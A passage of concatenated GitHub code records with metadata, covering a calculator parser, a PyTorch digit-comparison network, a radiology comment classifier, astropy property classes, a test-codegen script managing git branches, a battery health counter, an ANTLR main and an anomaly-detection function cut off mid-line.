m2.append(m[i])\n# проверка конца выражения 1 сценарий (если последнее действие + или - после * или / в конце выражения )\n elif i + 2 == len(m) and m[i] != '*' and multiply == True or i + 2 == len(m) and m[i] != '/' and multiply == True: \n m2.append(m[i])\n m2.append(int(m[i + 1]))\n# проверка конца выражения 2 сценарий (если последнее действие + или - в конце выражения)\n elif i + 2 == len(m) and m[i] != '*' or i + 2 == len(m) and m[i] != '/': \n m2.append(int(m[i - 1]))\n m2.append(m[i])\n m2.append(int(m[i + 1]))\n# если в предыдущем действие нет * или / \n# и это небыло мульти циклом этих действий\n elif multiply == False:\n m2.append(int(m[i - 1])) # ставлю предыдущее число \n m2.append(m[i]) # ставлю знак \"шага\"\n multiply = False\n if len(m) == 3 and len(m2) == 2:\n m2.append(int(m[i + 1]))\n return m2\n\n# _______тело программы____________________\n#ищю скобку и записываю выражение в новый массив\nfor i in range(0, len(m) - 1):\n if m[i] == '(':\n bracket_start = i\n bracket = True\n m3.clear()\n if m[i] == ')': \n bracket = False\n if bracket == True and m[i] != '(': \n m3.append(m[i])\n bracket_count += 1\n# убраем из первичного массива выражение в скобках\nif bracket_count != 0 and m3 != None: \n i = 0\n while i < bracket_count + 2: # двойка чтобы убрать скобки\n m.pop(bracket_start)\n i += 1\n # print(m)\n m3 = multiplication_calculation(m3, multiply, new_object)\n# вычисляю скобку и полученное значение записываем в начало массива \nif bracket_count != 0 and len(m3) > 1:\n temp = calc_expression(m3[0], m3[2], m3[1])\n for i in range(4, len(m3), 2):\n temp = calc_expression(temp, m3[i], m3[i - 1])\n m.insert(bracket_start, temp)\n m3.clear()\n #print(m)\nelif bracket_count == 0 and len(m3) == 1:\n m.insert(0, temp)\n m3.clear()\n #print(m)\n \n#print (m)\nm = multiplication_calculation(m, multiply, new_object)\n#print (m)\n# обобщение полученых вычислений\nif len(m) > 1:\n temp = calc_expression(m[0], m[2], m[1])\n for i in range(4, len(m), 2):\n temp = calc_expression(temp, m[i], m[i - 1])\nelse:\n temp = m[0]\nprint(f'\\nРезультат вычисления выражения: {n} = {temp}\\n')\n\n","repo_name":"AlexK1r/pyton_examples","sub_path":"helloPython/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13984806240","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[13]:\n\n\nimport torch\nimport math\nimport datetime\nimport time\nimport numpy as np\nfrom torch import optim\nfrom torch import Tensor\nfrom torch.autograd import Variable\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torch.nn as nn\nimport dlc_practical_prologue \nimport matplotlib.pyplot as plt\nimport warnings\nfrom random import seed\nfrom random import randint\n\n\n# # Creating Convolutional network\n\n# In[28]:\n\n\nclass Conv_Net(nn.Module):\n '''\n Creating the class for the convolutional net. The kernel size, stride and padding are chosen such as to have approximately \n 70 000 parameters in total.\n\n '''\n def __init__(self, nb_hidden):\n super(Conv_Net, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 32, kernel_size=3, stride=2, padding=2), #Convolutional layer \n nn.ReLU(), #ReLU activation\n nn.MaxPool2d(kernel_size=3, stride=2)) #Pooling layer\n self.layer2 = nn.Sequential(\n nn.Conv2d(32, 64, kernel_size=3, stride=2, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2))\n \n self.fc1 = nn.Linear(64, nb_hidden) #Fully Connected layers\n self.fc2 = nn.Linear(nb_hidden, 10)\n \n #Recreating all layers in order not to have weight sharing\n \n self.layer1_noWS = nn.Sequential(\n nn.Conv2d(1, 32, kernel_size=3, stride=2, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2))\n self.layer2_noWS = nn.Sequential(\n nn.Conv2d(32, 64, kernel_size=3, stride=2, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2))\n \n self.fc1_noWS = nn.Linear(64, nb_hidden) \n self.fc2_noWS = nn.Linear(nb_hidden, 10)\n \n self.layer1_Comp = nn.Linear(20, 100) #Layers for digit comparison\n self.relu = nn.ReLU()\n self.layerh_Comp = nn.Linear(100, 100)\n self.layer2_Comp = nn.Linear(100, 2)\n\n def forward(self, option_ws, train_input):\n img1 = train_input.narrow(1,0,1) #Extracting the first image\n img2 = train_input.narrow(1,1,1) #Extracting the second image\n \n x1 = self.layer1(img1) #Processing the images in the neural network\n x1 = self.layer2(x1)\n x1 = x1.reshape(x1.size(0), -1)\n x1 = self.fc1(x1)\n x1 = self.fc2(x1)\n \n if option_ws == \"no_weight_sharing\": #No weight sharing: img2 uses different layers than img1\n x2 = self.layer1_noWS(img2)\n x2 = self.layer2_noWS(x2)\n x2 = x2.reshape(x2.size(0), -1)\n x2 = self.fc1_noWS(x2)\n x2 = self.fc2_noWS(x2)\n elif option_ws == \"weight_sharing\": #Weight sharing: img2 uses the same layers as img1\n x2 = self.layer1(img2)\n x2 = self.layer2(x2)\n x2 = x2.reshape(x2.size(0), -1)\n x2 = self.fc1(x2)\n x2 = self.fc2(x2)\n else :\n return \"Please choose the type of convolutional network you would like to use: 'weight_sharing' or 'no_weight_sharing'.\"\n \n z = torch.cat((x1,x2),1) #Concatenating x and y\n z = self.layer1_Comp(z)\n z = self.relu(z)\n z = self.layerh_Comp(z)\n z = self.relu(z)\n z = self.layer2_Comp(z) #Result of the comparison\n \n \n return x1, x2, z\n\n\ndef count_parameters(model): \n '''\n Function that counts the nuber of parameters in the convolutional net\n input: model - the neural network used\n output: nb_param - the number of parameters in the neural network\n ''' \n nb_param = sum(p.numel() for p in model.parameters() if p.requires_grad)\n return nb_param\n\n\n# # Training the convolutional network\n\n# In[23]:\n\n\ndef compute_error_rate(option_ws, option_err, model, input_img, input_target):\n '''\n Function that computes the error rate with an option to compute error rate of images or direct comparison.\n input: option_err - choice for computing the error rate of the images or the prediction of the direct comparison\n option_ws - choice for using the neural network with or without weight sharing\n model - the neural network\n input_img - the two images\n input_target - the real comparison\n output: error_rate - the error rate as calculated according to the option chosen\n '''\n size = input_img.size(0)\n img1, img2, comp = model(option_ws, input_img)\n \n if option_err == \"images\":\n _, number1 = torch.max(img1, 1)\n _, number2 = torch.max(img2, 1)\n predicted = (number1 <= number2)\n error_rate = (torch.sum(input_target != predicted).item()/size)*100\n \n elif option_err == \"outcome\":\n _, isbigger = torch.max(comp, 1) \n error_rate = (torch.sum(input_target != isbigger).item()/size)*100\n else :\n return \"Please choose the type of error rate you would like to calculate: 'images' or 'outcome'.\"\n return error_rate\n\n\n# In[30]:\n\n\ndef train_model(option_ws, option_loss, model, train_input, train_target, test_input, test_target,\\\n batch_size, learning_rate, nb_epochs, train_classes, test_classes):\n '''\n Function that trains the neural network. Option to calculate the loss in an auxiliary manner or only based on the outcome.\n input: option_ws - choice for using the neural network with or without weight sharing\n option_loss - choice for calculating the loss in an auxiliary manner or only based on the comparison\n model - the neural network\n train_input - the train input generated by the generate_pair_sets function\n train_target - the train target generated by the generate_pair_sets function\n test_input - the test input generated by the generate_pair_sets function\n test_target - the test target generated by the generate_pair_sets function\n output: loss_array - an array with all the calculated losses\n test_err1 - the test error for the comparison by images\n test_err2 - the test error for the direct comparison\n train_err1 - the train error for the comparison by images\n train_err2 - the train error for the direct comparison\n '''\n criterion = nn.CrossEntropyLoss() #Criterion for loss calculation\n optimizer = optim.SGD(model.parameters(), lr = learning_rate)\n loss_array = []\n test_err1 = [] #Test error based on the images\n test_err2 = [] #Test error based on the outcome\n train_err1 = [] #Train error based on the images\n train_err2 = [] #Train error based on the outcome\n\n #Looping on the number of epochs\n for e in range(nb_epochs):\n start_time = time.time() #Calulating time for one round\n loss_sum = 0\n for b in range(0, train_input.size(0), batch_size):\n \n #Loss calculations using the chosen criterion\n img1, img2, comp = model(option_ws, train_input.narrow(0, b, batch_size))\n loss_img1 = criterion(img1, train_classes.narrow(0, b, batch_size).narrow(1,0,1).view(-1))\n loss_img2 = criterion(img2, train_classes.narrow(0, b, batch_size).narrow(1,1,1).view(-1))\n loss_comp = criterion(comp, train_target.narrow(0, b, batch_size))\n if option_loss == \"auxiliary\":\n loss_final = loss_img1 + loss_img2 + loss_comp #Auxiliary loss \n elif option_loss == \"no_auxiliary\":\n loss_final = loss_comp\n else:\n return \"Please choose the type of loss you would like to use: 'auxiliary' or 'no_auxiliary'.\"\n model.zero_grad()\n loss_final.backward()\n optimizer.step()\n loss_sum += loss_final.item()\n loss_array.append(loss_sum)\n \n #Putting the error rates in the correspondent arrays\n \n test_err1.append(compute_error_rate(option_ws, \"images\", model, test_input, test_target))\n test_err2.append(compute_error_rate(option_ws, \"outcome\", model, test_input, test_target))\n train_err1.append(compute_error_rate(option_ws, \"images\", model, train_input, train_target))\n train_err2.append(compute_error_rate(option_ws, \"outcome\", model, train_input, train_target))\n \n end_time = time.time()\n time_elapsed = end_time-start_time\n print('\\nElapsed time for training :{}'.format(time_elapsed))\n \n return loss_array, test_err1, test_err2, train_err1, train_err2\n\n\n# # Printing and plotting values\n\n# In[31]:\n\n\ndef print_values(nb_epochs, loss_array, test_err1, test_err2, train_err1, train_err2):\n '''\n Function that prints the error rate values for every round\n input: nb_epochs - the number of epochs used for one round\n round - the current round\n loss_array - an array with all the calculated losses\n test_err1 - the test error for the comparison by images\n test_err2 - the test error for the direct comparison\n train_err1 - the train error for the comparison by images\n train_err2 - the train error for the direct comparison\n '''\n loss_array = np.array(loss_array).round(3)\n test_err1 = np.array(test_err1).round(3)\n test_err2 = np.array(test_err2).round(3)\n train_err1 = np.array(train_err1).round(3)\n train_err2 = np.array(train_err2).round(3)\n \n print('\\nLoss array for {} epochs : \\n'.format(nb_epochs))\n print(*loss_array, sep = \" / \")\n print('\\nTest error rate for images : \\n')\n print(*test_err1, sep = \" / \" )\n print('\\nTest error rate for outcome : \\n')\n print(*test_err2, sep = \" / \" )\n print('\\nTrain error rate for images \\n')\n print(*train_err1, sep = \" / \" )\n print('\\nTrain error rate for outcome : \\n')\n print(*train_err2, sep = \" / \" )\n\ndef plot_error_rate(test_err1, test_err2, train_err1, train_err2):\n '''\n A function that plots the error rate over epochs\n input: test_err1 - the test error for the comparison by images\n test_err2 - the test error for the direct comparison\n train_err1 - the train error for the comparison by images\n train_err2 - the train error for the direct comparison\n '''\n lines = plt.plot(test_err1, 'r', test_err2, 'r--', train_err1, 'b', train_err2, 'b--')\n plt.ylabel('Error rate')\n plt.xlabel('Epochs')\n plt.title(\"Test error in red, train error in blue\")\n plt.legend(iter(lines), ('Test error images', 'Test error outcome', 'Train error images', 'Train error outcome'))\n plt.show()\n\n\n# # Computing and printing mean and standard deviation\n\n# In[32]:\n\n\ndef plot_results(test_err1_array, test_err2_array, train_err1_array, train_err2_array):\n '''\n A function that computes the mean standard deviation for the test and train errors\n input: test_err1_array - the array of the test errors for the comparison by images\n test_err2_array - the array of the test errors for the direct comparison\n train_err1_array - the array of the train errors for the comparison by images\n train_err2_array - the array of the train errors for the direct comparison\n '''\n \n lines = plt.plot(test_err1_array, 'r', test_err2_array, 'r--', train_err1_array, 'b', train_err2_array, 'b--')\n plt.ylabel('Error rate')\n plt.xlabel('Rounds')\n plt.title(\"Test and train errors based on images and outcome\")\n plt.legend(iter(lines), ('Test error images', 'Test error outcome', 'Train error images', 'Train error outcome'))\n plt.show()\n \n test_err1_mean = np.mean(test_err1_array)\n test_err2_mean = np.mean(test_err2_array)\n train_err1_mean = np.mean(train_err1_array)\n train_err2_mean = np.mean(train_err2_array)\n \n test_err1_std = np.std(test_err1_array)\n test_err2_std = np.std(test_err2_array)\n train_err1_std = np.std(train_err1_array)\n train_err2_std = np.std(train_err2_array)\n\n print('Test error based on images : \\n mean : {:.3f} - standard deviation : {:.3f}'.format(test_err1_mean, test_err1_std))\n print('Test error based on outcome : \\n mean : {:.3f} - standard deviation : {:.3f}'.format(test_err2_mean, test_err2_std))\n print('Train error based on images : \\n mean : {:.3f} - standard deviation : {:.3f}'.format(train_err1_mean, train_err1_std))\n print('Train error based on outcome : \\n mean : {:.3f} - standard deviation : {:.3f}'.format(train_err2_mean, train_err2_std))\n\n\n\n\n\n\n\n","repo_name":"nek11/Projects","sub_path":"Proj1/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":13188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19867088349","text":"from sentence_transformers import SentenceTransformer\nfrom sklearn.metrics import cohen_kappa_score\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn import linear_model\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport scipy\nfrom sklearn.metrics import log_loss\nimport xgboost as xgb\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import roc_auc_score\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import f1_score, classification_report, accuracy_score\nfrom sklearn.ensemble import RandomForestClassifier\n# RegEx for removing non-letter characters\nimport re\nimport csv\n# NLTK library for the remaining steps\nimport nltk\nnltk.download(\"stopwords\") # download list of stopwords (only once; need not run it again)\nfrom nltk.corpus import stopwords # import stopwords\nimport sys\nfrom nltk.stem.porter import *\nimport pickle\n\nstemmer = PorterStemmer()\ndef review_to_words(review):\n # TODO: Remove HTML tags and non-letters,\n #soup = BeautifulSoup(review, 'html5lib')\n text = review.lower()\n # convert to lowercase, tokenize,\n text = re.sub(r\"[^a-zA-Z0-9]\", ' ', text.lower())\n words = text.split()\n # remove stopwords and stem\n words = [w.strip() for w in words if w not in stopwords.words('english')]\n words = [stemmer.stem(w) for w in words]\n\n # Return final list of words\n return ' '.join(words)\n\n\n\n\nclass radiologyretive(object):\n def __init__(self):\n self.LMmodel = SentenceTransformer('all-mpnet-base-v2')\n self.xgb_model = {}\n self.labels = None\n\n def encode(self, sentences):\n return self.LMmodel.encode(sentences)\n def train_main(self, traindf, testdf, labels):\n ##load pretarined model \n self.labels = labels\n try:\n traindf =traindf.fillna(' ')\n traindf['Comments_proc'] = traindf['Comments'].apply(review_to_words)\n testdf =testdf.fillna(' ')\n testdf['Comments_proc'] = testdf['Comments'].apply(review_to_words)\n except:\n sys.exit('Please provide a file with Comments')\n if any(item not in traindf.columns for item in labels) and any(item not in testdf.columns for item in labels):\n sys.exit('Please provide a correct labels in the train and test file')\n print('Training and validation file read')\n train_sentence_embeddings = self.encode(traindf['Comments'])\n test_sentence_embeddings = self.encode(testdf['Comments'])\n gt = []\n pred = []\n legend = []\n print(self.labels)\n for l in self.labels:\n try:\n y_train = traindf[l].values\n y_valid = testdf[l].values\n self.xgb_model[l] = xgb.XGBClassifier(objective='binary:logistic', eta=0.3, silent=1, subsample=0.8, scale_pos_weight=99).fit(train_sentence_embeddings, y_train) \n xgb_prediction = self.xgb_model[l].predict_proba(test_sentence_embeddings)\n print(l)\n print(classification_report(y_valid, self.xgb_model[l].predict(test_sentence_embeddings)))\n gt.append(y_valid)\n pred.append(self.xgb_model[l].predict_proba(test_sentence_embeddings))\n legend.append(l)\n print('-------------------------------------------------')\n except:\n self.xgb_model[l] = 'Null'\n print('Didnot work: '+l)\n\n def test_main(self, test):\n try:\n test =test.fillna(' ')\n test['Comments_proc'] = test['Comments'].apply(review_to_words)\n except:\n sys.exit('Please provide a file with Comments')\n pred_dyn = []\n test_sentence_embeddings = self.encode(test['Comments'])\n flg = []\n for l in self.labels:\n try:\n pred_dyn.append(self.xgb_model[l].predict(test_sentence_embeddings))\n except:\n flg.append(l)\n pred_dyn.append([0] * test_sentence_embeddings.shape[0])\n print('Didnot work: '+l)\n for i in range(len(self.labels)):\n if self.labels[i] not in flg:\n test[self.labels[i]] = pred_dyn[i]\n return test\n\n def getList(self, dict):\n return list(dict.keys())\n\n \n def model_load(self, modelpath):\n #try:\n self.xgb_model = pickle.load(open(modelpath+'LMXgboost.sav', 'rb'))\n self.labels = self.getList(self.xgb_model)\n print('Model loaded!!')\n #except:\n # sys.exit('Model couldn\\'t be loaded')\n\n def model_save(self, modelpath):\n try:\n pickle.dump(self.xgb_model, open(modelpath+'LMXgboost.sav', 'wb'))\n print('Model saved!!')\n except:\n print('Model saving didn\\'t worked')\n","repo_name":"imonban/RadiologyFeedback","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23950965788","text":"from astropy.time import Time\nfrom astropy import units as u\nfrom decimal import Decimal, InvalidOperation\n\nclass Time(object):\n \"\"\"An astropy time property\"\"\"\n\n def __init__(self, data, key, time_format):\n \"\"\"Initialize a TimeProperty instance by saving the raw value of\n data[key] to this class. We will compute the actual time object only on\n demand.\n\n Args:\n data: a dictionary containing many keys including the expected key\n key: a string key expected to exist in data\n time_format: a string indicating format of the time anticipated in\n the data dictionary, see the astropy.time docs for appropriate\n time formats:\n http://docs.astropy.org/en/stable/api/astropy.time.Time.html\n \"\"\"\n self.value = None\n self._raw_value = data.get(key, None)\n self._time_format = time_format\n\n def __get__(self, instance, owner):\n \"\"\"Only when the value of the instance is requested is the time object\n created. After it is created it is saved to self.value so that it does\n not have to be calculated again.\n\n Returns:\n an astropy.Time object\n \"\"\"\n if not self.value:\n self.value = self._create_time()\n return self.value\n\n def _create_time(self):\n \"\"\"Create an astropy.Time object from the raw value and time format\n saved to the instance.\n\n Returns:\n an astropy.Time object\n \"\"\"\n return Time(self._raw_value, format=self._time_format)\n\n\nclass Quantity(object):\n \"\"\"A Quantity property - something with value an units\"\"\"\n\n def __init__(self, data, key, units=None):\n \"\"\"Initialize the Quantity property instance by saving the raw value\n of data[key] to this instance. We will calculate the actual Quantity\n only on demand\n\n Args:\n data: a dictionary containing many keys including the expected key\n key: a string key expected to exist in data\n unit_format: a string key denoting the appropriate units to use\n \"\"\"\n self.value = None\n self._raw_value = data.get(key, None)\n self._units = units\n\n def __get__(self, instance, owner):\n if not self.value:\n self.value = self._create_quantity()\n return self.value\n\n def _create_quantity(self):\n \"\"\"Create an astropy.Quantity instnace by multiplying a decimal\n representation of the raw value with the astropy.units object\n associated with this instance.\n\n Returns:\n an astropy.Quantity object or None if it cannot be created from\n the known values\n \"\"\"\n try:\n if self._units:\n return Decimal(self._raw_value) * self._get_astropy_units()\n else:\n return Decimal(self._raw_value)\n except (InvalidOperation, TypeError):\n return None\n\n def _get_astropy_units(self):\n \"\"\"Return the appropriate astropy units object\"\"\"\n valid_units = {\n 'yr': u.yr,\n 'AU': u.AU,\n 'km': u.km,\n 'deg': u.deg,\n 'deg/day': u.deg / u.d\n }\n return valid_units.get(self._units, None)\n\n\nclass BooleanFlag(object):\n \"\"\"Returns a simple boolean value based on the raw input\"\"\"\n\n def __init__(self, data, key):\n self.value = None\n self._flag = data.get(key, None)\n\n def __get__(self, instance, owner):\n if self.value is None:\n self.value = self._flag == 1\n return self.value\n","repo_name":"qdonnellan/mpc-client","sub_path":"mpc_client/properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"41418534445","text":"# keep the python package and codegen package separate\nimport argparse\nimport json\nimport os\n\nimport get_stage_attributes\nimport read_input_data\nimport integrate_functions\nfrom loggerUtility import logger\nfrom utility_functions import get_start_and_end_line_number_of_tc, check_word\nfrom UserSetiing import DataCollectorPath\nfrom utility_functions import create_git_branch\n\n\n# Reading test case file name and arguments from command line\n# only run if below modules are the entry point to the program. Restricting access to other module\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('git_branch', help='GitBranch, please provide git branch ')\n parser.add_argument('file_name', help='StageName, please provide file name')\n parser.add_argument('test_cases', nargs='*', help='TestCaseNames, please provide test case name')\n args = parser.parse_args()\n git_branch = args.git_branch\n file_name = args.file_name\n test_cases = args.test_cases\n\n file_path = f'{DataCollectorPath}/stage/configuration/{file_name}'\n\n # If no test_cases are provided from command line, then script will check for all the test cases in the file.\n if len(test_cases) == 0:\n with open(file_path, 'r') as file:\n lines = file.readlines()\n all_test_cases = check_word(lines, 'def test')[2]\n all_test_cases = ['test_' + tc.split('(')[0][len('def test') + 1:] for tc in all_test_cases]\n test_cases = all_test_cases\n # Finding valid test cases i.e. test case should be present in both the stage file and input_file.json\n with open('data/input_data.json', \"r\") as input_file:\n json_data = json.load(input_file)\n invalid_test_cases = list(set(test_cases) - set(list(json_data.keys())))\n # This second condition comes in handy when no test cases passed i.e. we need to check for all the test cases,\n # in case number of invalid_test_cases will be many so we are not logging anything.\n if len(invalid_test_cases) > 0 and len(args.test_cases) > 0:\n logger.info(f'Below test cases are not implemented in input file')\n print(invalid_test_cases)\n\n valid_test_cases = list(set(test_cases).intersection(set(list(json_data.keys()))))\n test_cases = valid_test_cases\n run_only_once = True\n is_error_occurred_in_creation_of_git_branch = True\n try:\n for test_case in test_cases:\n # Create branch only for valid test cases, i.e. calling create_git_branch function in for loop.\n if run_only_once:\n create_git_branch(git_branch)\n is_error_occurred_in_creation_of_git_branch = False\n # Read the stage file name for every test_case.\n with open(file_path, 'r') as f:\n lines = f.readlines()\n get_start_end_lines_of_tc_in_lines = get_start_and_end_line_number_of_tc(lines, test_case)\n _, start_line_no_of_tc_in_lines, end_line_no_of_tc_in_lines = get_start_end_lines_of_tc_in_lines\n # Extracting the required lines of test case from the entire file.\n tc_lines = lines[start_line_no_of_tc_in_lines:end_line_no_of_tc_in_lines]\n len_tc_lines = len(tc_lines)\n # Remove empty line(2 extra lines after pass) in the gathered test case lines\n while len_tc_lines > 0:\n if tc_lines[len_tc_lines-1] == '\\n':\n tc_lines.pop(len_tc_lines-1)\n else:\n break\n len_tc_lines -= 1\n # Extracting the stage attributes from the parametrize statements.\n unique_attributes = get_stage_attributes.get_stage_attributes(tc_lines, test_case,\n \"@pytest.mark.parametrize('stage_attributes'\")\n\n output_from_read_input_data_from_json_file = read_input_data.read_input_data_from_json_file(\n 'data/input_data.json', test_case)\n integrate_functions.integrate_test_case(run_only_once, file_name, lines, tc_lines,\n test_case, get_start_end_lines_of_tc_in_lines,\n output_from_read_input_data_from_json_file)\n run_only_once = False\n except Exception as error:\n # if any exception occurs above (such as file not found) then this flag will be set to True\n logger.exception(error)\n # if any exception occurs above, before this any part of the code already write to file name then, delete the\n # git branch.\n if not is_error_occurred_in_creation_of_git_branch:\n os.chdir(f'{DataCollectorPath}')\n os.system('git checkout -- .')\n os.system('git checkout master')\n os.system(f'git branch -D {git_branch}')\n logger.info(f'git branch {git_branch} has been deleted')\n","repo_name":"khushbutal/configure_for_environment_poc","sub_path":"main_poc.py","file_name":"main_poc.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70400247927","text":"\ndef count_batteries_by_health(present_capacities):\n counts = {\n \"healthy\": 0,\n \"exchange\": 0,\n \"failed\": 0\n }\n\n for present_capacity in present_capacities:\n SoH = 100 * present_capacity/120\n #classification of the ranges\n if SoH <= 100 and SoH > 80:\n counts[\"healthy\"] += 1\n elif 63 <= SoH <= 80:\n counts[\"exchange\"] += 1\n else:\n counts[\"failed\"] += 1\n \n return counts\n\ndef test_bucketing_by_health():\n print(\"Counting batteries by SoH...\\n\")\n present_capacities = [113, 116, 80, 95, 92, 70]\n counts = count_batteries_by_health(present_capacities)\n assert(counts[\"healthy\"] == 2)\n assert(counts[\"exchange\"] == 3)\n assert(counts[\"failed\"] == 1)\n print(\"Done counting :)\")\n\n\nif __name__ == '__main__':\n test_bucketing_by_health()\n","repo_name":"assignments-for-discussion/battery-inventory-in-py-varuni-kulkarni","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3604451253","text":"\"\"\"\nMain script for grammar Expr2\n\n\"\"\"\n\n__version__ = '0.1.1'\n__author__ = 'Ali'\n\n\nfrom antlr4 import *\n\nfrom Code.CustomTypeCheckerListener import CustomTypeCheckerListener\nfrom gen.TypeCheckerLexer import TypeCheckerLexer\nfrom gen.TypeCheckerParser import TypeCheckerParser\n\n# Step 0: Give an input\ninput_string = '2+3*3.9'\n\n# Step 1: Convert input to a byte stream\nstream = InputStream(input_string)\n# Step 2: Create lexer\nlexer = TypeCheckerLexer(stream)\n# Step 3: Create a list of tokens\ntoken_stream = CommonTokenStream(lexer)\n# Step 4: Create parser\nparser = TypeCheckerParser(token_stream)\n# Step 5: Create parse tree\nparse_tree = parser.start()\n\n# Step 6: Adding a listener\nmy_listener = CustomTypeCheckerListener()\n\n\nwalker = ParseTreeWalker()\ntry:\n walker.walk(listener=my_listener, t=parse_tree)\nexcept Exception as e:\n print(e)\n","repo_name":"AliKhodaaei/AntlrTypeChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18643991080","text":"import pandas as pd\nimport time\nimport anomaly_detection_methods_helpers as ah\nimport matplotlib.pyplot as plt\nimport sys \nsys.path.append(\"../characteristics\") \nimport characteristics_helpers as ch\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn.metrics import mean_squared_error\n\ndef glim(ts_obj, gaussian_window_size, step_size, family='gaussian', eta=1.0, lambda_=0.9999, plot_anomaly_score=False, plot_forecast=False, grid_search_mode=False):\n \"\"\"\n Invokes GLiM.\n\n :param ts_obj\n TimeSeries object\n :param gaussian_window_size:\n Gaussian window size for creating anomaly scores\n :param step_size:\n Step size for creating anomaly scores\n :param plot_anomaly_scores:\n Plot anomaly scores if True\n :param plot_forecast:\n Plot predictions vs observations if True\n \"\"\"\n start = time.time()\n # there are missing time steps. fill them with NaNs\n if ts_obj.miss:\n ref_date_range = ch.get_ref_date_range(ts_obj.dataframe, ts_obj.dateformat, ts_obj.timestep)\n gaps = ref_date_range[~ref_date_range.isin(ts_obj.dataframe[\"timestamp\"])]\n filled_df = ch.fill_df(ts_obj.dataframe, ts_obj.timestep, ref_date_range, \"fill_nan\")\n endog = filled_df.set_index('timestamp')['value']\n exog = ah.get_exogenous(endog, ts_obj.get_dateformat())\n else:\n endog = ts_obj.dataframe.set_index('timestamp')['value']\n exog = ah.get_exogenous(endog, ts_obj.get_dateformat())\n \n # use entire time series for training\n full = ts_obj.get_length()\n initial_mean = endog.iloc[:full].mean()\n initial_stddev = endog.iloc[:full].std()\n results = online_glim(endog, exog, family=family, eta=eta, lambda_=lambda_, initial_loc=initial_mean, initial_scale=initial_stddev, save_precision=True)\n\n if ts_obj.miss:\n\n filled_results_predictions_values = []\n for item in results.predictions.values:\n if item != item:\n filled_results_predictions_values.append(0)\n else:\n filled_results_predictions_values.append(item)\n\n filled_results_errors_values = []\n for item in results.errors.values:\n if item != item:\n filled_results_errors_values.append(0)\n else:\n filled_results_errors_values.append(item)\n\n\n filled_df[\"results_predictions\"] = filled_results_predictions_values\n filled_df[\"results_errors_values\"] = filled_results_errors_values\n filled_df = filled_df.dropna()\n results_predictions = filled_df[\"results_predictions\"].values\n results_errors_values = filled_df[\"results_errors_values\"].values\n else:\n results_predictions = results.predictions.values\n results_errors_values = results.errors.values\n\n if grid_search_mode:\n\n if plot_forecast:\n plt.plot(list(results_predictions), label=\"Predictions\", alpha=.7)\n plt.plot(list(ts_obj.dataframe[\"value\"].values), label=\"Data\", alpha=.5)\n plt.legend()\n plt.show()\n \n rmse = mean_squared_error(ts_obj.dataframe[\"value\"].values, results_predictions, squared=False)\n print(\"RMSE: \", rmse)\n return rmse\n\n # print(len(results_errors_values))\n # print(full)\n # print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\n anomaly_scores = ah.determine_anomaly_scores_error(\n results_errors_values, np.zeros_like(results_errors_values),\n full, gaussian_window_size, step_size)\n\n end = time.time()\n\n if plot_forecast:\n plt.plot(list(results_predictions), label=\"Predictions\", alpha=.7)\n plt.plot(list(ts_obj.dataframe[\"value\"].values), label=\"Data\", alpha=.5)\n plt.legend()\n plt.show()\n\n if plot_anomaly_score:\n plt.subplot(211)\n plt.title(\"Anomaly Scores\")\n plt.plot(anomaly_scores)\n plt.ylim([.99,1])\n plt.subplot(212)\n plt.title(\"Time Series\")\n plt.plot(ts_obj.dataframe[\"value\"].values) \n plt.axvline(ts_obj.get_probationary_index(), color=\"black\", label=\"probationary line\")\n plt.tight_layout()\n plt.show()\n\n return {\n 'Anomaly Scores': anomaly_scores,\n 'Time': end-start,\n \"Predictions\": results_predictions\n }\n\n\ndef online_glim(endog, exog, lambda_=1.0, eta=1.0, family='gaussian',\n initial_loc=None, initial_scale=None, save_precision=False):\n \"\"\"\n :param lambda_: Decay factor for \"RLS\"\n :param eta: learning rate (kludge, helps with stability in some cases)\n :param link: specify the distribution\n :param initial_loc: initial value for location parameter (affects stability)\n :param initial_scale: initial value for scale parameter\n :param save_precision: store the precision matrix at each time step\n \"\"\"\n link = {\n 'gaussian': ah.Gaussian,\n 'poisson': ah.Poisson,\n }[family]()\n N = endog.shape[0]\n M = exog.shape[1]\n errors = np.zeros(N)\n predictions = np.zeros(N)\n estimates = np.zeros((N,M))\n precisions = np.zeros((N,M,M)) if save_precision else None\n lambda_inv = np.reciprocal(lambda_)\n P = np.eye(M)\n w = np.zeros(M)\n if 'Intercept' in exog.columns:\n intercept_index = exog.columns.get_loc('Intercept')\n w[intercept_index] = link.inv_mean(initial_loc)\n for t in tqdm(range(N)):\n u, d = exog.values[t], endog.values[t]\n # predict\n z = w.dot(u)\n y = link.mean(z)\n # update\n if not np.isnan(d):\n xi 